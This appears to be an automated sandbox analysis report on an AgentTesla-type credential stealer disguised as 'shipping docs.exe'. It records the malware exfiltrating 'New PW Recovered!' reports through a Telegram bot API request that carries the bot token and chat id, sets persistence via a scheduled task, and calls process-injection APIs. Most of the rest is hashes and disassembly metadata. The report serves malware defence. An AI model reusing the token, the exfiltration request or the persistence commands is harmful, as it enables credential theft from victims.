{"ok":true,"result":{"message_id":311,"from":{"id":5676971476,"is_bot":true,"first_name":"strongerman","username":"strongermanbot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1669753233,"document":{"file_name":"user-618321 2022-11-29 21-20-31.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBN2OGaZHRgrJuUwePcvH_QNl91xMeAAKHEAACD804UEp9TiMBCfU9KwQ","file_unique_id":"AgADhxAAAg_NOFA","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49701 | 149.154.167.220 | 443 | C:\Users\user\Desktop\shipping docs.exe

Timestamp | kBytes transferred | Direction | Data
2022-11-29 20:20:48 UTC | 4 | OUT | POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dad24f9334eaaa
Host: api.telegram.org
Content-Length: 1006
Expect: 100-continue
Connection: Keep-Alive
2022-11-29 20:20:48 UTC | 4 | IN | HTTP/1.1 100 Continue
2022-11-29 20:20:48 UTC | 4 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 39 33 33 34 65 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 39 33 33 34 65 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 31 38 33 32 31 0a 4f 53 46 75 6c 6c
Data Ascii: -----------------------------8dad24f9334eaaaContent-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad24f9334eaaaContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/618321OSFull
2022-11-29 20:20:48 UTC | 5 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 29 Nov 2022 20:20:48 GMT
Content-Type: application/json
Content-Length: 644
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":313,"from":{"id":5676971476,"is_bot":true,"first_name":"strongerman","username":"strongermanbot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1669753248,"document":{"file_name":"user-618321 2022-11-29 21-20-43.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBOWOGaaDiWt7zrb8IZSr8Wvk1uQO8AAKJEAACD804UE0tpTB8RDcQKwQ","file_unique_id":"AgADiRAAAg_NOFA","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}



Target ID: 0
Start time: 21:18:57
Start date: 29/11/2022
Path: C:\Users\user\Desktop\shipping docs.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\shipping docs.exe
Imagebase: 0x140000
File size: 606720 bytes
MD5 hash: 6308AE755A893C15A989B1CCF2C56393
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low

Target ID: 1
Start time: 21:19:08
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
Imagebase: 0xe0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 21:19:08
Start date: 29/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                            Target ID:3
                                                                                            Start time:21:19:09
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\Desktop\shipping docs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:{path}
                                                                                            Imagebase:0xbb0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Target ID:4
                                                                                            Start time:21:19:09
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            Imagebase:0x8f0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 73%, ReversingLabs
                                                                                            Reputation:low

                                                                                            Target ID:14
                                                                                            Start time:21:19:26
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                                                                                            Imagebase:0x9a0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 73%, ReversingLabs
                                                                                            Reputation:low

                                                                                            Target ID:15
                                                                                            Start time:21:19:36
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                                                                                            Imagebase:0x7f0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:low

                                                                                            Target ID:16
                                                                                            Start time:21:19:41
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
                                                                                            Imagebase:0xe0000
                                                                                            File size:185856 bytes
                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:17
                                                                                            Start time:21:19:42
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:18
                                                                                            Start time:21:19:44
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:{path}
                                                                                            Imagebase:0xaf0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Target ID:19
                                                                                            Start time:21:19:56
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                                                                                            Imagebase:0xe0000
                                                                                            File size:185856 bytes
                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:20
                                                                                            Start time:21:19:57
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Target ID:21
                                                                                            Start time:21:19:57
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:{path}
                                                                                            Imagebase:0x9a0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security


                                                                                              Execution Graph

                                                                                              Execution Coverage:14.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:13%
                                                                                              Total number of Nodes:285
                                                                                              Total number of Limit Nodes:11

Control-flow Graph

• Graph with entry block 4a465a9-4a465d9 (rendered graph not reproduced)
Strings
Memory Dump Source
• Source File: 00000000.00000002.278100258.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4a40000_shipping docs.jbxd
Similarity
• API ID:
• String ID: $ $ $ $'$'$'$*$8$>$B$C$J$K$L$N$P$T$U$V$X$[$c$n$p$p$w$x$y
• API String ID: 0-2341653528
• Opcode ID: 3d9219ea3c4c4e905815cc9833dca2d2cb0658225e3e82ad1f9e763ea20dee51
• Instruction ID: a9121f413dd4bfe7027fff9f87dccfa878292fa7e335e62af81aaff867713edf
• Opcode Fuzzy Hash: 3d9219ea3c4c4e905815cc9833dca2d2cb0658225e3e82ad1f9e763ea20dee51
• Instruction Fuzzy Hash: A3331434A11615CFCB54EF28C958BACB7F2AF8A705F1141E9E10AAB361DB75AD81CF40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block 4a465b8-4a488da (rendered graph not reproduced)
Strings
Memory Dump Source
• Source File: 00000000.00000002.278100258.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4a40000_shipping docs.jbxd
Similarity
• API ID:
• String ID: $ $ $ $'$'$'$*$8$>$B$C$J$K$L$N$P$T$U$V$X$[$c$n$p$p$w$x$y
• API String ID: 0-2341653528
• Opcode ID: da79044549a35eb34336e32b2f4f243969d21c1061f403900282b73202c048f4
• Instruction ID: 8f975cc594ce1d76c179277cd4ccbbd4a90300f3a93f51b397f8ac1c67bfd5f1
• Opcode Fuzzy Hash: da79044549a35eb34336e32b2f4f243969d21c1061f403900282b73202c048f4
• Instruction Fuzzy Hash: 7D330434A51615CFCB54EF28C958BACB7F2AF8A705F1141E9E10AAB361DB71AD81CF40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block 44813d0-44813f5 (rendered graph not reproduced)
Strings
Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID:
• String ID: C!s[$_e/$_e/
• API String ID: 0-1613511610
• Opcode ID: 214d9c26c45f60d17972b9309694981d2fed6cb0efac40e4d6f7820d1e582fa0
• Instruction ID: bfa449c85c549e2c1ceb2702022841589d82cd577770cb398566a6e9995e125c
• Opcode Fuzzy Hash: 214d9c26c45f60d17972b9309694981d2fed6cb0efac40e4d6f7820d1e582fa0
• Instruction Fuzzy Hash: 1B615CB0E06218DBDF14DF95E5816EEFBB6BF89310F24A42BD406B7244E734A9468B14
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block 44813c1-44813f5 (rendered graph not reproduced)
Strings
Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID:
• String ID: C!s[$_e/$_e/
• API String ID: 0-1613511610
• Opcode ID: 1b8bc0ca78156adc92a7bde1aade485d0d92a2346896571c0ec119941a86a357
• Instruction ID: d637332a48b533dcacb6707017050f3f459ff0bba044a1832a5836bc34ff1d07
• Opcode Fuzzy Hash: 1b8bc0ca78156adc92a7bde1aade485d0d92a2346896571c0ec119941a86a357
• Instruction Fuzzy Hash: 3D518C70E06218DBDF04DFA5E5846EEFBB2EF89310F24A42FD406B7254E734A9468B14
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID:
• String ID: 7iz
• API String ID: 0-2637832990
• Opcode ID: 639b3e1437acaaea98d04c2b859357b9299437b8a271f6bb6b15c2dcfa0dbe0d
• Instruction ID: 53204f2fb1f69e512e5c589f720489aeca20f3f2733ec613a33151cbf9686bdf
• Opcode Fuzzy Hash: 639b3e1437acaaea98d04c2b859357b9299437b8a271f6bb6b15c2dcfa0dbe0d
• Instruction Fuzzy Hash: 3B71F5B4E09208CFCF14EFA5D5845ADBBB2FB59710F24A52ED80AB7254E735A942CF04
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74cb58c95a23f9078cdf0bc81162976ee1c8b905f174113ddeed8252209ce83d
• Instruction ID: 8856d6b5d3e11d9e0c0b857cda0b99e5e5c684918a785a4b7b77edc532ef7ee0
• Opcode Fuzzy Hash: 74cb58c95a23f9078cdf0bc81162976ee1c8b905f174113ddeed8252209ce83d
• Instruction Fuzzy Hash: 4C913574E0524CDFCB08DFA5E8545AEBBB2FF89304F25806AD816AB365DB346902CF51
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2c803f4fad423bbc9db44b9a3eae5700900b4f0bd3dd7c01c2d150627291ad90
• Instruction ID: a76b5db9f643fcdecc96b02e2e0800f81fe32bf1ed202278fcdedee8ec19ce1a
• Opcode Fuzzy Hash: 2c803f4fad423bbc9db44b9a3eae5700900b4f0bd3dd7c01c2d150627291ad90
• Instruction Fuzzy Hash: 5971D674E1121CDFDB08DFA5E9545AEBBB2FF89305F21802AD816AB364DB346902CF51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block b79148-b79150 (rendered graph not reproduced)
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00B7938E
Memory Dump Source
• Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 59c4aa35d7bdcbcb6e9ab210cc7c0ce491a1e90ee7bcf220af6e2c702f8ec5cb
• Instruction ID: ba9f3ff32a68f4286bc9ce100d07d532a06800cab62b3414d1b7556700b17695
• Opcode Fuzzy Hash: 59c4aa35d7bdcbcb6e9ab210cc7c0ce491a1e90ee7bcf220af6e2c702f8ec5cb
• Instruction Fuzzy Hash: 57712270A00B059FD724DF2AD44575ABBF1FF88314F008A6DD49ADBA41DB74E9058F91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block 4482bf5-4482c8b (rendered graph not reproduced)
APIs
• CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04482D53
Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: ccfa535ee5666bc47de91b9d69e15a060912e485940f1e29d1ccde6d1cf6f43d
• Instruction ID: b008289b142606501d4d56787c0b6f7a25ace9af4520f535cdc9c36a5977f616
• Opcode Fuzzy Hash: ccfa535ee5666bc47de91b9d69e15a060912e485940f1e29d1ccde6d1cf6f43d
• Instruction Fuzzy Hash: 9E510771900329DFDF24DF95C880BDEBBB5BF48314F1584AAE908A7250DB71AA85CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block 4482c00-4482c8b (rendered graph not reproduced)
APIs
• CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04482D53
Memory Dump Source
• Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: c63340e0be68601fc45bcf8cca51943ea0f81f3b19172a7333a4ba1302438a93
• Instruction ID: c30ab7a39cd7394e1b63595a5da25cce7e833ed7455a1c351ed33324dc44968a
• Opcode Fuzzy Hash: c63340e0be68601fc45bcf8cca51943ea0f81f3b19172a7333a4ba1302438a93
• Instruction Fuzzy Hash: B1510771900329DFDF24DF95C880BDEBBB5BF48304F1584AAE908A7250DB71AA85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph (graph image not reproduced): function b7fa4d-b7fbc9, CreateWindowExW called in block b7fb1b-b7fb7a
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B7FB6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 1595679dbb89ec702d5b570b00c038f66d856d69065406fa07f5b12dfaba7428
                                                                                              • Instruction ID: 7fa643928d59fa510a9dd45a2bd628b686de26aade2b10995a7d75f3192f5e5a
                                                                                              • Opcode Fuzzy Hash: 1595679dbb89ec702d5b570b00c038f66d856d69065406fa07f5b12dfaba7428
                                                                                              • Instruction Fuzzy Hash: 5051CEB1D003099FDB14CFAAC884ADEBFB5FF48314F24816AE819AB250D7709945CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph (graph image not reproduced): function b7dccc-b7fbc9, CreateWindowExW called in block b7fadb-b7fb7a
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B7FB6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 12daf8036172dea68d196263af23d920e609b0dba4ccfd7dc034e70319301d40
                                                                                              • Instruction ID: 6893fdc2e7d33da4cdf19847ec5749b7e2ab1d18de67c6de40638f134b2955c9
                                                                                              • Opcode Fuzzy Hash: 12daf8036172dea68d196263af23d920e609b0dba4ccfd7dc034e70319301d40
                                                                                              • Instruction Fuzzy Hash: C351CFB1D003499FDB14CF99C884ADEBBF5FF48354F24816AE819AB250D7749845CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A423B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.278100258.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4a40000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 2691d35cee36f5e2a4ee9051474d3074da01aa9f333abe634db770dc1757cc5a
                                                                                              • Instruction ID: e0beb62321c2b98d911284b81acf3cac7486c57f70fd2a598304ad1b9e6f31d6
                                                                                              • Opcode Fuzzy Hash: 2691d35cee36f5e2a4ee9051474d3074da01aa9f333abe634db770dc1757cc5a
                                                                                              • Instruction Fuzzy Hash: 9041F7B5A003458FDB14CF99C488B9EBBF5FF88354F258499E519AB321D374A841CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04483235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: c90ee5a0dbb4a65e2fbeefb4c2827f45b3c59e973730b1bdee69d61538cf3b15
                                                                                              • Instruction ID: 9331c1ecfd38726555e863d6cf0275816782d92982a07baf09e674d7a7ebef67
                                                                                              • Opcode Fuzzy Hash: c90ee5a0dbb4a65e2fbeefb4c2827f45b3c59e973730b1bdee69d61538cf3b15
                                                                                              • Instruction Fuzzy Hash: 9621F2B19002499FCB10DFAAD885BDEFBF4FB48314F10842AE959A7250D378A945CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04483C6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 4e676ee71e94bbd9e534764cda595e2869040b6c4cf3c45d4b89f5a3eae5be2f
                                                                                              • Instruction ID: 43810aaf5b24925e4b7ac4c377257f3297bc58fe9b1917aed4118416d7d98dce
                                                                                              • Opcode Fuzzy Hash: 4e676ee71e94bbd9e534764cda595e2869040b6c4cf3c45d4b89f5a3eae5be2f
                                                                                              • Instruction Fuzzy Hash: 352134B68002498FDB20DF99D488BDEFBF4EB58724F20841EE959A7600C375A585CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B7B71E,?,?,?,?,?), ref: 00B7B7DF
